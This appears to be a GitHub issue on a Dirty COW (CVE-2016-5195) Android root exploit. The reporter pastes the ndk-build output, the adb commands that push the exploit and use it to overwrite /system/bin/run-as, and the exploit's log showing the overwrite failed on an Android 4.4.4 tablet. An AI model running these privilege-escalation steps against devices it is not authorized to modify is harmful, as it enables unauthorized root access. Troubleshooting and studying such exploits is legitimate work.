Can't overwrite run-as executable #92
Description
Can't overwrite run-as executable on Galaxy Tab E (Arch armeabi-v7a, Android 4.4.4 KitKat API 19)
ADB file transfer and dcow execution are successful, but when the executable tries to overwrite /system/bin/run-as it fails without logging anything
Here is the output of make root plus adb shell '/system/bin/run-as':
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-19
make[1]: Entering directory '/home/cyberazor/CVE-2016-5195'
[armeabi-v7a] Compile thumb : dirtycow <= dirtycow.c
[armeabi-v7a] Compile thumb : dirtycow <= dcow.c
[armeabi-v7a] Executable : dirtycow
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Compile thumb : run-as <= dirtycow.c
[armeabi-v7a] Compile thumb : run-as <= run-as.c
[armeabi-v7a] Executable : run-as
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/home/cyberazor/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5476) and destination file size (9440) differ
[*] size 9440
[*] mmap 0xb6ea8000
[*] currently 0xb6ea8000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6ea8000 9440
[*] madvise = 0 16777216
[*] /proc/self/mem 293580704 486075
[*] exploited 0 0xb6ea8000=464c457f
adb shell '/system/bin/run-as'
Usage: run-as <package-name> <command> [<args>]
The first thing the executable should do is printing argv[0] (the program relative/absolute path) and the UID, if it doesn't, it's not the exploit executable, but the original one, so the overwriting of the run-as executable failed